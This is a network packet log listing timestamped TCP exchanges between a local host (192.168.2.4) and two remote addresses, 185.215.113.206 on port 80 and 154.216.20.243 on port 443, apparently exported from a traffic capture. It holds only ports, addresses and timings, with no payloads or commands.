Dec 9, 2024 08:08:55.735321045 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:55.735397100 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:55.735630035 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:55.735671043 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:55.735891104 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:55.735934019 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:55.739042997 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:55.739093065 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:55.740082979 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:55.740096092 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:55.740108013 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:55.740132093 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:55.740158081 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:55.741106033 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:55.741153955 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:55.741525888 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:55.741571903 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:55.741982937 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:55.742027044 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:55.742451906 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:55.742495060 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:55.743556023 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:55.743598938 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:55.743817091 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:55.743859053 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:55.745146036 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:55.745193958 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:55.745450020 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:55.745493889 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:55.746773958 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:55.746819973 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:55.746993065 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:55.747042894 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:55.748351097 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:55.748398066 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:55.748589039 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:55.748634100 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:55.750134945 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:55.750176907 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:55.751019001 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:55.751066923 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:55.751501083 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:55.751543045 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:55.751940966 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:55.751979113 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:55.753123999 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:55.753165007 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:55.753314018 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:55.753350973 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:55.754700899 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:55.754748106 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:55.754964113 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:55.755008936 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:55.756267071 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:55.756310940 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:55.756618977 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:55.756664038 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:55.759049892 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:55.759094000 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:55.759474039 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:55.759515047 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:55.762011051 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:55.762054920 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:55.762598991 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:55.762634993 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:55.764708042 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:55.764750957 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:55.764870882 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:55.764909029 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:55.765911102 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:55.765969992 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:55.766062021 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:55.766098976 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:55.767319918 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:55.767375946 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:55.767539024 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:55.767579079 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:55.769027948 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:55.769064903 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:55.769197941 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:55.769234896 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:55.770721912 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:55.770771027 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:55.770987034 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:55.771024942 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:55.771966934 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:55.772008896 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:55.772181988 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:55.772221088 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:55.773221970 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:55.773260117 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:55.773411989 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:55.773447990 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:55.774444103 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:55.774486065 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:55.774602890 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:55.774640083 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:55.775423050 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:55.775471926 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:55.775552034 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:55.775595903 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:55.776365042 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:55.776427984 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:55.776503086 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:55.776550055 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:55.777427912 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:55.777467966 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:55.777555943 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:55.777597904 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:55.778613091 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:55.778650999 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:55.778738976 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:55.778775930 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:55.780083895 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:55.780119896 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:55.780337095 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:55.780374050 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:55.781668901 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:55.781708956 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:55.781984091 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:55.782020092 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:55.783266068 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:55.783303976 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:55.783525944 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:55.783567905 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:55.784837008 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:55.784881115 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:55.785078049 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:55.785125971 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:55.786402941 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:55.786458015 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:55.786653996 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:55.786690950 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:55.787998915 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:55.788039923 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:55.788250923 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:55.788289070 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:55.789582014 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:55.789623976 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:55.789822102 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:55.789870024 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:55.791157007 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:55.791201115 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:55.791465998 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:55.791506052 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:55.792757988 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:55.792798996 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:55.793035030 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:55.793076038 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:55.794244051 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:55.794284105 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:55.794457912 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:55.794493914 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:55.795726061 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:55.795764923 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:55.795998096 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:55.796036005 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:55.797224998 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:55.797266006 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:55.797437906 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:55.797480106 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:55.798681974 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:55.798721075 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:55.798935890 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:55.798974037 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:55.800168991 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:55.800208092 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:55.800410986 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:55.800451040 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:55.801609993 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:55.801654100 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:55.801863909 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:55.801911116 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:55.851597071 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:55.851614952 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:55.851625919 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:55.851638079 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:55.851648092 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:55.851655006 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:55.851679087 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:55.851687908 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:55.851922989 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:55.851972103 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:55.853338003 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:55.853384018 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:55.853686094 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:55.853725910 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:55.854798079 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:55.854846001 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:55.854985952 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:55.855032921 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:55.856110096 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:55.856151104 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:55.856456041 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:55.856502056 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:55.857707024 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:55.857750893 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:55.857985973 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:55.858026981 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:55.858962059 CET	443	49879	154.216.20.243	192.168.2.4
Dec 9, 2024 08:08:55.858987093 CET	443	49879	154.216.20.243	192.168.2.4
Dec 9, 2024 08:08:55.858994007 CET	443	49879	154.216.20.243	192.168.2.4
Dec 9, 2024 08:08:55.859010935 CET	443	49879	154.216.20.243	192.168.2.4
Dec 9, 2024 08:08:55.859021902 CET	443	49879	154.216.20.243	192.168.2.4
Dec 9, 2024 08:08:55.859033108 CET	443	49879	154.216.20.243	192.168.2.4
Dec 9, 2024 08:08:55.859038115 CET	49879	443	192.168.2.4	154.216.20.243
Dec 9, 2024 08:08:55.859055042 CET	443	49879	154.216.20.243	192.168.2.4
Dec 9, 2024 08:08:55.859067917 CET	49879	443	192.168.2.4	154.216.20.243
Dec 9, 2024 08:08:55.859102964 CET	49879	443	192.168.2.4	154.216.20.243
Dec 9, 2024 08:08:55.859297037 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:55.859330893 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:55.859832048 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:55.859872103 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:55.860517025 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:55.860559940 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:55.860812902 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:55.860856056 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:55.862060070 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:55.862109900 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:55.862442970 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:55.862483025 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:55.927614927 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:55.927664995 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:55.927814007 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:55.927853107 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:55.928297997 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:55.928338051 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:55.928699970 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:55.928747892 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:55.929121017 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:55.929169893 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:55.929585934 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:55.929626942 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:55.931050062 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:55.931061983 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:55.931091070 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:55.931102037 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:55.931957006 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:55.931968927 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:55.932008982 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:55.932862043 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:55.932873964 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:55.932909012 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:55.933779955 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:55.933790922 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:55.933825970 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:55.935759068 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:55.935770988 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:55.935803890 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:55.936587095 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:55.936598063 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:55.936629057 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:55.936645985 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:55.937537909 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:55.937550068 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:55.937587023 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:55.938466072 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:55.938477993 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:55.938514948 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:55.938543081 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:55.939387083 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:55.939398050 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:55.939435959 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:55.940318108 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:55.940330029 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:55.940366030 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:55.940376997 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:55.941242933 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:55.941255093 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:55.941293955 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:55.942183018 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:55.942188978 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:55.942219019 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:55.942245007 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:55.943141937 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:55.943154097 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:55.943186998 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:55.943212032 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:55.945012093 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:55.945023060 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:55.945063114 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:55.945075989 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:55.945894003 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:55.945899010 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:55.945940971 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:55.946841002 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:55.946851969 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:55.946888924 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:55.947765112 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:55.947777987 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:55.947810888 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:55.948681116 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:55.948694944 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:55.948728085 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:55.949610949 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:55.949623108 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:55.949657917 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:55.949683905 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:55.950524092 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:55.950536013 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:55.950572968 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:55.951492071 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:55.951503038 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:55.951539040 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:55.951539040 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:55.952419996 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:55.952431917 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:55.952464104 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:55.954473019 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:55.954484940 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:55.954528093 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:55.954539061 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:55.955511093 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:55.955528021 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:55.955559969 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:55.955626965 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:55.956568956 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:55.956582069 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:55.956593037 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:55.956614971 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:55.956629992 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:55.957573891 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:55.957586050 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:55.957618952 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:55.958689928 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:55.958700895 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:55.958734035 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:55.959631920 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:55.959642887 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:55.959673882 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:55.959691048 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:55.960675955 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:55.960686922 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:55.960696936 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:55.960722923 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:55.960733891 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:55.962727070 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:55.962742090 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:55.962766886 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:55.962778091 CET	49880	80	192.168.2.4	185.215.113.206
